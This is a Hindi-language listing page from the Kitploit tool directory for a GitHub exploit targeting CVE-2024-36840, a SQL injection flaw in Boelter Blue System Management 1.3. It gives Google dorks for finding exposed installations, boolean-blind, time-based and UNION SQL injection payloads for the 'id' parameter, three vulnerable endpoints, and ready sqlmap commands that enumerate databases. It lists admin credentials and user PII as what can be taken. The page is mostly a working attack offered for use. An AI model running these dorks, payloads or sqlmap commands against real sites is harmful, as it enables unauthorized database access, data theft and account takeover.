Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-36840-Exploit — # CVE-2024-36840 के लिए एक्सप्लॉइट: Boelter Blue System Management में SQL इंजेक्शन भेद्यता (संस्करण 1.3) | Kitploit
उपकरण/GitHubGitHub/theexploiters/cve-2024-36840-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubtheexploiters/cve-2024-36840-exploit

CVE-2024-36840-Exploit

# CVE-2024-36840 के लिए एक्सप्लॉइट: Boelter Blue System Management में SQL इंजेक्शन भेद्यता (संस्करण 1.3)

रिपॉजिटरी देखें
2181 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-36840: बोएल्टर ब्लू सिस्टम मैनेजमेंट (संस्करण 1.3) में SQL इंजेक्शन भेद्यता

एक्सप्लॉइट विवरण

  • एक्सप्लॉइट शीर्षक: बोएल्टर ब्लू सिस्टम मैनेजमेंट (संस्करण 1.3) में SQL इंजेक्शन भेद्यता

  • मूल Google Dork: inurl:"Powered by Boelter Blue" (काम नहीं किया (खोज में शून्य URL))

  • Theexploiters द्वारा Google Dork: intext:"Powered by Boelter Blue" (काम कर रहा है)

  • दिनांक: 2024-06-04

  • एक्सप्लॉइट लेखक: CBKB (DeadlyData, R4d1x)

  • विक्रेता होमपेज: Boelter Blue

  • सॉफ्टवेयर लिंक: Google Play Store

  • संस्करण: 1.3

  • परीक्षण किया गया: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12

  • CVE: CVE-2024-36840

भेद्यता विवरण

बोएल्टर ब्लू सिस्टम मैनेजमेंट (संस्करण 1.3) में कई SQL इंजेक्शन भेद्यताओं की पहचान की गई है। ये भेद्यताएं हमलावरों को विभिन्न मापदंडों के माध्यम से मनमाने SQL कमांड इंजेक्ट करने और निष्पादित करने की अनुमति देती हैं। सफल शोषण के परिणामस्वरूप अनधिकृत पहुंच, डेटा बहिर्गमन और संभावित खाता अधिग्रहण हो सकता है।

प्रभावित पैरामीटर और एक्सप्लॉइट विवरण:

  1. पैरामीटर: id (GET)

    • प्रकार: बूलियन-आधारित ब्लाइंड
    • पेलोड: id=10071 AND 4036=4036
  2. प्रकार: समय-आधारित ब्लाइंड

    • पेलोड: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)
  3. प्रकार: UNION क्वेरी

    • पेलोड: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...

संवेदनशील एंडपॉइंट

  1. news_details.php?id

    • उदाहरण: https://www.example.com/news_details.php?id=10071
    • शोषण:
      root@kitploit:~
      sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
      
  2. services.php?section

    • उदाहरण: https://www.example.com/services.php?section=5081
    • शोषण:
      root@kitploit:~
      sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
      
  3. location_details.php?id

    • उदाहरण: https://www.example.com/location_details.php?id=836
    • शोषण:
      root@kitploit:~
      sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
      

प्रभाव

  • अनधिकृत डेटाबेस पहुंच: शोषण से डेटाबेस तक अनधिकृत पहुंच हो सकती है, जिससे हमलावर संवेदनशील जानकारी निकाल सकते हैं।
  • डेटा रिसाव: एडमिन क्रेडेंशियल, उपयोगकर्ता PII और खरीद इतिहास जैसे संवेदनशील डेटा से समझौता किया जा सकता है।
  • खाता अधिग्रहण: हमलावर संभावित रूप से उपयोगकर्ता खातों पर कब्जा कर सकते हैं।
  • पूर्ण नियंत्रण: प्रभावित एप्लिकेशन पर पूर्ण नियंत्रण प्राप्त किया जा सकता है, जिससे गंभीर सुरक्षा निहितार्थ उत्पन्न होते हैं।

श्रेय

  • खोजकर्ता: CBKB (DeadlyData, R4d1x)

संदर्भ

  • CyberDepot Vulnerability Report
  • CVE-2024-36840

Repo View Counter

टूल डाउनलोड करें